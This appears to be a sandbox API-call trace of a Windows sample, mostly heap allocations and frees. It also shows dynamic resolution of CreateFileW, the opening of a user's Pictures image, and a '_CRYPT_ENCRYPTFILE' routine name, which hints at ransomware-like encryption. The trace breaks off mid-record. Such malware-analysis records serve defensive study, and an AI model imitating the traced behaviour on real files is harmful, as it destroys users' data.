1 [0087.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.216] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0087.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0087.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.217] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0087.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0087.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0087.218] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bwdi74zs0.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0087.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0087.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0087.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0087.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0087.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0087.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0087.220] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0087.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.285] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.285] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.286] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0087.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a0e0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0087.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0087.288] CloseHandle (hObject=0x298) returned 1 [0087.288] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.289] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0087.289] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb170c140, ftCreationTime.dwHighDateTime=0x1d5e759, ftLastAccessTime.dwLowDateTime=0x7eeac220, ftLastAccessTime.dwHighDateTime=0x1d5ec54, ftLastWriteTime.dwLowDateTime=0x7eeac220, ftLastWriteTime.dwHighDateTime=0x1d5ec54, 